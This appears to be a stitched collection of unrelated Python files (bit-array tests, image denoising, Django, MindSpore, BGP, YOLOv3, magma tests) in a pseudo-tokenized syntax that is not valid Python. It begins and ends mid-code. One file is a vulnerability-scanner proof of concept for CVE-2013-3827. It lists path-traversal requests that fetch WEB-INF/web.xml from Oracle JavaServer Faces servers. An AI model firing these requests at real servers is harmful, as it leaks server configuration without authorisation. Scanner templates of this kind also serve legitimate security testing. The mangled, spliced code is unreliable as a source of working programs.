b"")<line_sep>self.assertEqual(bytes(bits("10100101")) b"\xa5")<line_sep>self.assertEqual(bytes(bits("110100101")) b"\xa5\x01")<block_end><def_stmt>test_repr self<block_start>self.assertEqual(repr(bits("")) r"bits('')")<line_sep>self.assertEqual(repr(bits("1010")) r"bits('1010')")<block_end><def_stmt>test_getitem_int self<block_start>some=bits("10001001011")<line_sep>self.assertEqual(some[0] 1)<line_sep>self.assertEqual(some[2] 0)<line_sep>self.assertEqual(some[5] 0)<line_sep>self.assertEqual(some[-1] 1)<line_sep>self.assertEqual(some[-2] 0)<line_sep>self.assertEqual(some[-5] 1)<block_end><def_stmt>test_getitem_slice self<block_start>some=bits("10001001011")<line_sep>self.assertBits(some[:] 11 0b10001001011)<line_sep>self.assertBits(some[2:] 9 0b100010010)<line_sep>self.assertBits(some[2:9] 7 0b0010010)<line_sep>self.assertBits(some[2:-2] 7 0b0010010)<line_sep>self.assertBits(some[3:2] 0 0b0)<block_end><def_stmt>test_getitem_wrong self<block_start><with_stmt>self.assertRaisesRegex(TypeError r"bits indices must be integers or slices, not str")<block_start>bits()["x"]<block_end><block_end><def_stmt>test_iter self<block_start>some=bits("10001001011")<line_sep>self.assertEqual(list(some) [1 1 0 1 0 0 1 0 0 0 1])<block_end><def_stmt>test_eq self<block_start>self.assertEqual(bits("1010") 0b1010)<line_sep>self.assertEqual(bits("1010") "1010")<line_sep>self.assertEqual(bits("1010") bits("1010"))<line_sep>self.assertNotEqual(bits("0010") 0b0010)<line_sep>self.assertNotEqual(bits("0010") "010")<line_sep>self.assertNotEqual(bits("1010") bits("01010"))<line_sep>self.assertNotEqual(bits("1010") <none>)<block_end><def_stmt>test_add self<block_start>self.assertBits(bits("1010")+bits("1110") 8 0b11101010)<line_sep>self.assertBits(bits("1010")+(0 1 1 1) 8 0b11101010)<line_sep>self.assertBits((0 1 1 1)+bits("1010") 8 0b10101110)<block_end><def_stmt>test_mul self<block_start>self.assertBits(bits("1011")<times>4 16 0b1011101110111011)<line_sep>self.assertBits(4<times>bits("1011") 16 0b1011101110111011)<block_end><def_stmt>test_and self<block_start>self.assertBits(bits("1010")&bits("1100") 4 0b1000)<line_sep>self.assertBits(bits("1010")&"1100" 4 0b1000)<line_sep>self.assertBits((0 1 0 1)&bits("1100") 4 0b1000)<block_end><def_stmt>test_or self<block_start>self.assertBits(bits("1010")|bits("1100") 4 0b1110)<line_sep>self.assertBits(bits("1010")|"1100" 4 0b1110)<line_sep>self.assertBits((0 1 0 1)|bits("1100") 4 0b1110)<block_end><def_stmt>test_xor self<block_start>self.assertBits(bits("1010")^bits("1100") 4 0b0110)<line_sep>self.assertBits(bits("1010")^"1100" 4 0b0110)<line_sep>self.assertBits((0 1 0 1)^bits("1100") 4 0b0110)<block_end><def_stmt>test_reversed self<block_start>self.assertBits(bits("1010").reversed() 4 0b0101)<block_end><def_stmt>test_find self<block_start>self.assertEqual(bits("1011").find(bits("11")) 0)<line_sep>self.assertEqual(bits("1011").find(bits("10")) 2)<line_sep>self.assertEqual(bits("1011").find(bits("01")) 1)<line_sep>self.assertEqual(bits("1011").find(bits("00")) -1)<line_sep>self.assertEqual(bits("101100101").find(bits("10") 0) 1)<line_sep>self.assertEqual(bits("101100101").find(bits("10") 2) 4)<line_sep>self.assertEqual(bits("101100101").find(bits("10") 5) 7)<line_sep>self.assertEqual(bits("101100101").find(bits("10") 8) -1)<line_sep>self.assertEqual(bits("1011").find(bits((1 0))) 1)<block_end><block_end>
|
<import_stmt>numpy<as>np<def_stmt>precompute_BM img kHW NHW nHW tauMatch<block_start>"""
:search for similar patches
:param img: input image
:param kHW: length of side of patch
:param NHW: how many patches are stacked
:param nHW: length of side of search area
:param tauMatch: threshold determine whether two patches are similar
:return ri_rj_N__ni_nj: The top N most similar patches to the referred patch
:return threshold_count: according to tauMatch how many patches are similar to the referred one
"""<line_sep>img=img.astype(np.float64)<line_sep>height,width=img.shape<line_sep>Ns=2<times>nHW+1<line_sep>threshold=tauMatch<times>kHW<times>kHW<line_sep>sum_table=np.ones((Ns Ns height width))<times>2<times>threshold# di, dj, ph, pw
row_add_mat,column_add_mat=get_add_patch_matrix(height width nHW kHW)<line_sep>diff_margin=np.pad(np.ones((height-2<times>nHW width-2<times>nHW)) nHW 'constant' constant_values=0.)<line_sep>sum_margin=(1-diff_margin)<times>2<times>threshold<for_stmt>di range(-nHW nHW+1)<block_start><for_stmt>dj range(-nHW nHW+1)<block_start>t_img=translation_2d_mat(img right=-dj down=-di)<line_sep>diff_table_2=(img-t_img)<times>(img-t_img)<times>diff_margin<line_sep>sum_diff_2=row_add_mat@diff_table_2@column_add_mat<line_sep>sum_table[di+nHW dj+nHW]=np.maximum(sum_diff_2 sum_margin)<block_end><block_end># sum_table (2n+1, 2n+1, height, width)
sum_table=sum_table.reshape((Ns<times>Ns height<times>width))# di_dj, ph_pw
sum_table_T=sum_table.transpose((1 0))# ph_pw__di_dj
argsort=np.argpartition(sum_table_T range(NHW))[: :NHW]<line_sep>argsort[: 0]=(Ns<times>Ns-1)<floordiv>2<line_sep>argsort_di=argsort<floordiv>Ns-nHW<line_sep>argsort_dj=argsort%Ns-nHW<line_sep>near_pi=argsort_di.reshape((height width -1))+np.arange(height)[: np.newaxis np.newaxis]<line_sep>near_pj=argsort_dj.reshape((height width -1))+np.arange(width)[np.newaxis : np.newaxis]<line_sep>ri_rj_N__ni_nj=np.concatenate((near_pi[: : : np.newaxis] near_pj[: : : np.newaxis]) axis=-1)<line_sep>sum_filter=np.where(sum_table_T<l>threshold 1 0)<line_sep>threshold_count=np.sum(sum_filter axis=1)<line_sep>threshold_count=closest_power_of_2(threshold_count max_=NHW)<line_sep>threshold_count=threshold_count.reshape((height width))<line_sep><return>ri_rj_N__ni_nj threshold_count<block_end><def_stmt>get_add_patch_matrix h w nHW kHW<block_start>row_add=np.eye(h-2<times>nHW)<line_sep>row_add=np.pad(row_add nHW 'constant')<line_sep>row_add_mat=row_add.copy()<for_stmt>k range(1 kHW)<block_start>row_add_mat<augadd>translation_2d_mat(row_add right=k down=0)<block_end>column_add=np.eye(w-2<times>nHW)<line_sep>column_add=np.pad(column_add nHW 'constant')<line_sep>column_add_mat=column_add.copy()<for_stmt>k range(1 kHW)<block_start>column_add_mat<augadd>translation_2d_mat(column_add right=0 down=k)<block_end><return>row_add_mat column_add_mat<block_end><def_stmt>translation_2d_mat mat right down<block_start>mat=np.roll(mat right axis=1)<line_sep>mat=np.roll(mat down axis=0)<line_sep><return>mat<block_end><def_stmt>closest_power_of_2 M max_<block_start>M=np.where(max_<l>M max_ M)<while_stmt>max_<g>1<block_start>M=np.where((max_<floordiv>2<l>M)<times>(M<l>max_) max_<floordiv>2 M)<line_sep>max_<augfloordiv>2<block_end><return>M<block_end><if_stmt>__name__<eq>'__main__'<block_start><import_stmt>os<import_stmt>cv2<import_from_stmt>utils add_gaussian_noise symetrize<line_sep># <hyper parameter>
# ref_i, ref_j = 196, 142
ref_i,ref_j=164 135<line_sep># ref_i, ref_j = 271, 206
kHW=8<line_sep>NHW=3<line_sep>nHW=16<line_sep>tauMatch=2500<line_sep># <hyper parameter \>
im=cv2.imread('test_data/image/Cameraman.png' cv2.IMREAD_GRAYSCALE)<line_sep>im=im[100: :]<line_sep>ref_i,ref_j=64 135<line_sep>im_noisy=add_gaussian_noise(im 10 seed=1)<line_sep>img_noisy_p=symetrize(im_noisy nHW)<line_sep>near_pij,threshold_count=precompute_BM(img_noisy_p kHW=kHW NHW=NHW nHW=nHW tauMatch=tauMatch)<line_sep>im=cv2.cvtColor(img_noisy_p cv2.COLOR_GRAY2RGB)<line_sep># <draw search area>
points_list=[(ref_j-nHW ref_i-nHW) (ref_j+nHW ref_i-nHW) (ref_j-nHW ref_i+nHW) (ref_j+nHW ref_i+nHW)]<for_stmt>point points_list<block_start>cv2.circle(im point 0 (0 0 255) 1)<block_end># <draw search area \>
# <draw reference patch>
cv2.rectangle(im (ref_j ref_i) (ref_j+kHW ref_i+kHW) color=(255 0 0) thickness=1)<line_sep># <draw reference patch \>
# <draw similar patches>
count=threshold_count[ref_i ref_j]<for_stmt>i,Pnear enumerate(near_pij[ref_i ref_j])<block_start><if_stmt>i<eq>0<block_start><continue><block_end><if_stmt>i<g>count<block_start><break><block_end>y,x=Pnear<line_sep>cv2.rectangle(im (x y) (x+kHW y+kHW) color=(0 255 0) thickness=1)<block_end># <draw similar patches \>
# cv2.imshow('im', im)
# cv2.waitKey()
cv2.imwrite('BM_real_im_test.png' im)<block_end>
|
<import_stmt>os<import_from_stmt>django.db connection<as>conn<import_from_stmt>. migration_sql_helpers<as>msh<import_from_stmt>api.iam.test.iam_test_case IamTestCase<class_stmt>TestMigrationSQLHelpers(IamTestCase)<block_start><def_stmt>test_find_func_dir self<block_start>"""
Test success finding function dir
"""<line_sep>self.assertNotEqual(msh.find_db_functions_dir() "")<block_end><def_stmt>test_no_find_func_dir self<block_start>"""
Test failure finding function dir
"""<with_stmt>self.assertRaises(FileNotFoundError)<block_start>msh.find_db_functions_dir("___________no_dir_here_____________")<block_end><block_end><def_stmt>test_apply_sql_file self<block_start>"""
Test apply sql file
"""<line_sep>filename="./___test_apply_sql_file.sql"<try_stmt><block_start><with_stmt>open(filename "wt")<as>f<block_start>print("select 1;" file=f)<block_end>self.assertEqual(msh.apply_sql_file(conn.schema_editor() filename) <true>)<block_end><finally_stmt><block_start>os.unlink(filename)<block_end><block_end><def_stmt>test_no_apply_sql_file self<block_start>"""
Test failure applying sql file
"""<line_sep>filename="./___test_apply_sql_file.sql"<try_stmt><block_start><with_stmt>open(filename "wt")<as>f<block_start>print("select 1;" file=f)<block_end><with_stmt>self.assertRaises(TypeError)<block_start>msh.apply_sql_file(<none> filename)<block_end><block_end><finally_stmt><block_start>os.unlink(filename)<block_end><block_end><block_end>
|
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
<import_stmt>numpy<as>np<import_stmt>mindspore<import_stmt>mindspore.context<as>context<import_stmt>mindspore.nn<as>nn<import_from_stmt>mindspore Tensor<import_from_stmt>mindspore.ops operations<as>P<line_sep>context.set_context(mode=context.GRAPH_MODE device_target="Ascend")<class_stmt>Net(nn.Cell)<block_start><def_stmt>__init__ self<block_start>super(Net self).__init__()<line_sep>self.unsorted_segment_sum=P.UnsortedSegmentSum()<line_sep>self.num_segments=3<block_end><def_stmt>construct self x segment_ids<block_start>x=self.unsorted_segment_sum(x segment_ids self.num_segments)<line_sep><return>x<block_end><block_end><def_stmt>test_net <block_start>input_x=np.random.randn(3 39 1).astype(np.float32)<line_sep>segment_ids=Tensor([0 1 2] mindspore.int32)<line_sep>net=Net()<line_sep>output=net(Tensor(input_x) segment_ids)<line_sep>print("result" output.asnumpy())<block_end><if_stmt>__name__<eq>"__main__"<block_start>test_net()<block_end>
|
<import_stmt>requests<line_sep># Vuln Base Info
<def_stmt>info <block_start><return>{"author":"cckuailong" "name":'''Javafaces LFI''' "description":'''An Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 192.168.127.12.0, 192.168.127.12.0, and 192.168.127.12.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.''' "severity":"medium" "references":["https://nvd.nist.gov/vuln/detail/CVE-2013-3827" "https://www.exploit-db.com/exploits/38802" "https://www.oracle.com/security-alerts/cpuoct2013.html"] "classification":{"cvss-metrics":"" "cvss-score":"" "cve-id":"CVE-2013-3827" "cwe-id":""} "metadata":{"vuln-target":"" } "tags":["cve" "cve2013" "lfi" "javafaces" "oracle"] }<block_end># Vender Fingerprint
<def_stmt>fingerprint url<block_start><return><true><block_end># Proof of Concept
<def_stmt>poc url<block_start>result={}<try_stmt><block_start>url=format_url(url)<line_sep>paths=["/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF" "/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." "/faces/javax.faces.resource/web.xml?loc=../WEB-INF" "/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." "/secureader/javax.faces.resource/web.xml?loc=../WEB-INF" "/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." "/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF" "/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.." "/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF" "/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."]<for_stmt>path paths<block_start>resp=requests.get(url+path timeout=10 verify=<false> allow_redirects=<false>)<if_stmt>resp.status_code<eq>200<and>"<web-app"<in>resp.text<and>"</web-app>"<in>resp.text<block_start>result["success"]=<true><line_sep>result["info"]=info()<line_sep>result["payload"]=url+path<line_sep><return>result<block_end><block_end><block_end><except_stmt><block_start>result["success"]=<false><block_end><return>result<block_end># Exploit, can be same with poc()
<def_stmt>exp url<block_start><return>poc(url)<block_end># Utils
<def_stmt>format_url url<block_start>url=url.strip()<if_stmt><not>(url.startswith('http://')<or>url.startswith('https://'))<block_start>url='http://'+url<block_end>url=url.rstrip('/')<line_sep><return>url<block_end>
|
<import_from_stmt>droidlet.memory.memory_nodes PlayerNode<class_stmt>HeuristicPerception<block_start><def_stmt>__init__ self agent<block_start>self.agent=agent<block_end><def_stmt>perceive self<block_start>bots=self.agent.world.get_bots()<for_stmt>bot bots# print(f"[Perception INFO]: Perceived bot [{bot.name}] in the world, update in memory]")
<block_start>bot_node=self.agent.memory.get_player_by_eid(bot.entityId)<if_stmt>bot_node<is><none><block_start>memid=PlayerNode.create(self.agent.memory bot)<line_sep>bot_node=PlayerNode(self.agent.memory memid)<line_sep>self.agent.memory.tag(memid "bot")<block_end>bot_node.update(self.agent.memory bot bot_node.memid)<line_sep>print(f"[Memory INFO]: update bot [{bot.name}] position: ({bot.pos.x}, {bot.pos.y}, {bot.pos.z})")<block_end>bot_memids=self.agent.memory.get_memids_by_tag("bot")<line_sep>bots_in_world=[b.entityId<for>b bots]<for_stmt>memid bot_memids<block_start>bot_eid=self.agent.memory.get_mem_by_id(memid).eid<if_stmt>bot_eid<not><in>bots_in_world<block_start>self.agent.memory.forget(memid)<line_sep>print(f"[Memory INFO]: delete bot [{bot_eid}] from memory")<block_end><block_end><block_end><block_end>
|
# Copyright (C) 2014 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Defines data types and models required specifically for RTC support.
"""<import_stmt>logging<import_from_stmt>ryu.lib.packet.bgp RF_RTC_UC<import_from_stmt>ryu.services.protocols.bgp.info_base.base Destination<import_from_stmt>ryu.services.protocols.bgp.info_base.base NonVrfPathProcessingMixin<import_from_stmt>ryu.services.protocols.bgp.info_base.base Path<import_from_stmt>ryu.services.protocols.bgp.info_base.base Table<line_sep>LOG=logging.getLogger('bgpspeaker.info_base.rtc')<class_stmt>RtcTable(Table)<block_start>"""Global table to store RT membership information.
Uses `RtDest` to store destination information for each known RT NLRI path.
"""<line_sep>ROUTE_FAMILY=RF_RTC_UC<def_stmt>__init__ self core_service signal_bus<block_start>Table.__init__(self <none> core_service signal_bus)<block_end><def_stmt>_table_key self rtc_nlri<block_start>"""Return a key that will uniquely identify this RT NLRI inside
this table.
"""<line_sep><return>str(rtc_nlri.origin_as)+':'+rtc_nlri.route_target<block_end><def_stmt>_create_dest self nlri<block_start><return>RtcDest(self nlri)<block_end><def_stmt>__str__ self<block_start><return>'RtcTable(scope_id: %s, rf: %s)'%(self.scope_id self.route_family)<block_end><block_end><class_stmt>RtcDest(Destination NonVrfPathProcessingMixin)<block_start>ROUTE_FAMILY=RF_RTC_UC<def_stmt>_new_best_path self new_best_path<block_start>NonVrfPathProcessingMixin._new_best_path(self new_best_path)<block_end><def_stmt>_best_path_lost self<block_start>NonVrfPathProcessingMixin._best_path_lost(self)<block_end><block_end><class_stmt>RtcPath(Path)<block_start>ROUTE_FAMILY=RF_RTC_UC<def_stmt>__init__ self source nlri src_ver_num pattrs=<none> nexthop='0.0.0.0' is_withdraw=<false> med_set_by_target_neighbor=<false><block_start>Path.__init__(self source nlri src_ver_num pattrs nexthop is_withdraw med_set_by_target_neighbor)<block_end><block_end>
|
##
# Copyright (c) 2005-2017 Apple Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# DRI: <NAME>, <EMAIL>
##
<import_from_stmt>txweb2.iweb IResponse<import_stmt>txweb2.dav.test.util<import_from_stmt>txweb2.test.test_server SimpleRequest<class_stmt>OPTIONS(txweb2.dav.test.util.TestCase)<block_start>"""
OPTIONS request
"""<def_stmt>test_DAV1 self<block_start>"""
DAV level 1
"""<line_sep><return>self._test_level("1")<block_end><def_stmt>test_DAV2 self<block_start>"""
DAV level 2
"""<line_sep><return>self._test_level("2")<block_end>test_DAV2.todo="DAV level 2 unimplemented"<def_stmt>test_ACL self<block_start>"""
DAV ACL
"""<line_sep><return>self._test_level("access-control")<block_end><def_stmt>_test_level self level<block_start><def_stmt>doTest response<block_start>response=IResponse(response)<line_sep>dav=response.headers.getHeader("dav")<if_stmt><not>dav<block_start>self.fail("no DAV header: %s"%(response.headers ))<block_end>self.assertIn(level dav "no DAV level %s header"%(level ))<line_sep><return>response<block_end><return>self.send(SimpleRequest(self.site "OPTIONS" "/") doTest)<block_end><block_end>
|
# The following comments couldn't be translated into the new config version:
# prescale
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>#
#
# \author <NAME>
#
EcalPhiSymMonDQM=cms.EDAnalyzer("HLTAlCaMonEcalPhiSym" # product to monitor
AlCaStreamEBTag=cms.untracked.InputTag("hltAlCaPhiSymStream" "phiSymEcalRecHitsEB") SaveToFile=cms.untracked.bool(<false>) FileName=cms.untracked.string('MonitorAlCaEcalPhiSym.root') AlCaStreamEETag=cms.untracked.InputTag("hltAlCaPhiSymStream" "phiSymEcalRecHitsEE") prescaleFactor=cms.untracked.int32(1) # DQM folder to write to
FolderName=cms.untracked.string('AlCaReco/EcalPhiSym'))<line_sep>
|
<import_stmt>numpy<as>np<import_from_stmt>contextlib suppress<def_stmt>convolve_linear signal filter output_size<block_start>out=np.zeros(output_size)<line_sep>sum=0<for_stmt>i range(output_size[0])<block_start><for_stmt>j range(output_size[1])<block_start><for_stmt>k range(max(0 i-filter.shape[0]) i+1)<block_start><for_stmt>l range(max(0 j-filter.shape[1]) j+1)<block_start><with_stmt>suppress(IndexError)<block_start>sum<augadd>signal[k l]<times>filter[i-k j-l]<block_end><block_end><block_end>out[i j]=sum<line_sep>sum=0<block_end><block_end><return>out<block_end><def_stmt>create_gaussian_kernel kernel_size<block_start>kernel=np.zeros((kernel_size kernel_size))<line_sep># The center must be offset by 0.5 to find the correct index
center=kernel_size<times>0.5+0.5<line_sep>sigma=np.sqrt(0.1<times>kernel_size)<def_stmt>kernel_function x y<block_start><return>np.exp(-((x-center+1)<power>2+(y-center+1)<power>2)/(2<times>sigma<power>2))<block_end>kernel=np.fromfunction(kernel_function (kernel_size kernel_size))<line_sep><return>kernel/np.linalg.norm(kernel)<block_end><def_stmt>create_sobel_operators <block_start>Sx=np.dot([[1.0] [2.0] [1.0]] [[-1.0 0.0 1.0]])/9<line_sep>Sy=np.dot([[-1.0] [0.0] [1.0]] [[1.0 2.0 1.0]])/9<line_sep><return>Sx Sy<block_end><def_stmt>sum_matrix_dimensions mat1 mat2<block_start><return>(mat1.shape[0]+mat2.shape[0] mat1.shape[1]+mat2.shape[1])<block_end><def_stmt>compute_sobel signal<block_start>Sx,Sy=create_sobel_operators()<line_sep>Gx=convolve_linear(signal Sx sum_matrix_dimensions(signal Sx))<line_sep>Gy=convolve_linear(signal Sy sum_matrix_dimensions(signal Sy))<line_sep><return>np.sqrt(np.power(Gx 2)+np.power(Gy 2))<block_end><def_stmt>create_circle image_resolution grid_extents radius<block_start>out=np.zeros((image_resolution image_resolution))<for_stmt>i range(image_resolution)<block_start>x_position=((i<times>grid_extents/image_resolution)-0.5<times>grid_extents)<for_stmt>j range(image_resolution)<block_start>y_position=((j<times>grid_extents/image_resolution)-0.5<times>grid_extents)<if_stmt>x_position<power>2+y_position<power>2<le>radius<power>2<block_start>out[i j]=1.0<block_end><block_end><block_end><return>out<block_end><def_stmt>main # Random distribution in x
<block_start>x=np.random.rand(100 100)<line_sep># Gaussian signals
<def_stmt>create_gaussian_signals i j<block_start><return>np.exp(-(((i-50)/100)<power>2+((j-50)/100)<power>2)/.01)<block_end>y=np.fromfunction(create_gaussian_signals (100 100))<line_sep># Normalization is not strictly necessary, but good practice
x<augdiv>np.linalg.norm(x)<line_sep>y<augdiv>np.linalg.norm(y)<line_sep># full convolution, output will be the size of x + y
full_linear_output=convolve_linear(x y sum_matrix_dimensions(x y))<line_sep># simple boundaries
simple_linear_output=convolve_linear(x y x.shape)<line_sep>np.savetxt("full_linear.dat" full_linear_output)<line_sep>np.savetxt("simple_linear.dat" simple_linear_output)<line_sep># creating simple circle and 2 different Gaussian kernels
circle=create_circle(50 2 0.5)<line_sep>circle=circle/np.linalg.norm(circle)<line_sep>small_kernel=create_gaussian_kernel(3)<line_sep>large_kernel=create_gaussian_kernel(25)<line_sep>small_kernel_output=convolve_linear(circle small_kernel sum_matrix_dimensions(circle small_kernel))<line_sep>large_kernel_output=convolve_linear(circle large_kernel sum_matrix_dimensions(circle large_kernel))<line_sep>np.savetxt("small_kernel.dat" small_kernel_output)<line_sep>np.savetxt("large_kernel.dat" large_kernel_output)<line_sep>circle=create_circle(50 2 0.5)<line_sep># Normalization
circle=circle/np.linalg.norm(circle)<line_sep># using the circle for sobel operations as well
sobel_output=compute_sobel(circle)<line_sep>np.savetxt("sobel_output.dat" sobel_output)<block_end>
|
# optimizer
optimizer=dict(type='AdamW' lr=0.0001 weight_decay=0.0005)<line_sep>optimizer_config=dict(grad_clip=dict(max_norm=1 norm_type=2))<line_sep># learning policy
lr_config=dict(policy='step' warmup='linear' warmup_iters=1000 warmup_ratio=0.001 step=[60000 72000] by_epoch=<false>)<line_sep># runtime settings
runner=dict(type='IterBasedRunner' max_iters=80000)<line_sep>checkpoint_config=dict(by_epoch=<false> interval=8000)<line_sep>evaluation=dict(interval=8000 metric='mIoU')<line_sep>
|
<import_from_stmt>keras.optimizers Adam<import_from_stmt>keras_yolov3.train get_anchors get_classes data_generator_wrapper<import_from_stmt>keras_yolov3.yolov3_class YOLOv3<import_stmt>tensorflow<as>tf<line_sep>config=tf.ConfigProto()<line_sep>config.gpu_options.allow_growth=<true><line_sep>sess=tf.Session(config=config)<line_sep>classes_path='../keras_yolov3/model_data/coco_classes.txt'<line_sep>anchors_path='../keras_yolov3/model_data/yolo_anchors.txt'<line_sep>class_names=get_classes(classes_path)<line_sep>num_classes=len(class_names)<line_sep>anchors=get_anchors(anchors_path)<line_sep>num_anchors=len(anchors)<line_sep>yolov3=YOLOv3(anchors num_classes)<line_sep>model_path='../keras_yolov3/model_data/yolo_weights.h5'<line_sep>yolov3.model.load_weights(model_path by_name=<true> skip_mismatch=<true>)<line_sep>annotation_path='../keras_yolov3/model_data/train.txt'<with_stmt>open(annotation_path)<as>f<block_start>lines=f.readlines()<block_end>num_train=len(lines)<line_sep>batch_size=32<line_sep>yolov3.model.compile(optimizer=Adam(lr=1e-3) loss={'yolo_loss':<lambda>y_true y_pred:y_pred})<line_sep>yolov3.model.fit_generator(data_generator_wrapper(lines batch_size yolov3.input_shape anchors num_classes) steps_per_epoch=max(1 num_train<floordiv>batch_size) epochs=50 initial_epoch=0)<line_sep>
|
<import_from_stmt>functools wraps partial<import_stmt>operator<import_stmt>pytest<import_stmt>magma<as>m<import_from_stmt>magma.smart SmartBit SmartBits concat signed make_smart<import_from_stmt>magma.testing check_files_equal<def_stmt>_run_test func=<none> * skip_check=<false><block_start><if_stmt>func<is><none><block_start><return>partial(_run_test skip_check=skip_check)<block_end>@wraps(func)<def_stmt>_wrapper *args **kwargs<block_start>name=func.__name__<line_sep>ckt=func(*args **kwargs)<line_sep>m.compile(f"build/{name}" ckt output="coreir-verilog" inline=<true>)<line_sep>build=f"build/{name}.v"<line_sep>gold=f"gold/{name}.v"<if_stmt><not>skip_check<block_start><assert_stmt>check_files_equal(__file__ build gold)<block_end><block_end><return>_wrapper<block_end>@_run_test<def_stmt>test_binop # Ops can be add, sub, mul, div, mod, and, or, xor.
<block_start>op=operator.add<class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) I1=m.In(SmartBits[12]) O1=m.Out(SmartBits[8]) O2=m.Out(SmartBits[12]) O3=m.Out(SmartBits[16]))<line_sep>val=op(io.I0 io.I1)<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<line_sep>io.O3<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_comparison # Ops can be eq, ne, ge, gt, le, lt.
<block_start>op=operator.eq<class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) I1=m.In(SmartBits[12]) O1=m.Out(SmartBits[1]) O2=m.Out(SmartBits[16]))<line_sep>val=op(io.I0 io.I1)<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_lshift <block_start><class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) I1=m.In(SmartBits[4]) O1=m.Out(SmartBits[8]) O2=m.Out(SmartBits[16]))<line_sep>val=io.I0<lshift>io.I1<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_rshift <block_start><class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) I1=m.In(SmartBits[4]) O1=m.Out(SmartBits[4]) O2=m.Out(SmartBits[8]) O3=m.Out(SmartBits[16]))<line_sep>val=io.I0<rshift>io.I1<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<line_sep>io.O3<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_concat <block_start><class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) I1=m.In(SmartBits[4]) I2=m.In(SmartBits[10]) O1=m.Out(SmartBits[4]) O2=m.Out(SmartBits[16]))<line_sep>val=concat(io.I0+io.I1 io.I2)<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_unary # Ops can be invert, neg.
<block_start>op=operator.invert<class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) O1=m.Out(SmartBits[4]) O2=m.Out(SmartBits[16]))<line_sep>val=op(io.I0)<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_reduction # Ops can be and, or, xor.
<block_start>op=operator.and_<class_stmt>_Test(m.Circuit)<block_start>io=m.IO(I0=m.In(SmartBits[8]) O1=m.Out(SmartBits[1]) O2=m.Out(SmartBits[16]))<line_sep>val=io.I0.reduce(op)<line_sep>io.O1<augmatmul>val<line_sep>io.O2<augmatmul>val<block_end><return>_Test<block_end>@_run_test<def_stmt>test_smoke # NOTE(rsetaluri): We use a CircuitBuilder here just so we can dynamically
# add ports to make the test specification easier. The test just creates a
# bunch of SmartBits values and does operations and wires them. This is
# easiest to do and check in the context of a circuit definition. It is also
# (mostly) possible to do them on anonymous values but is less convenient.
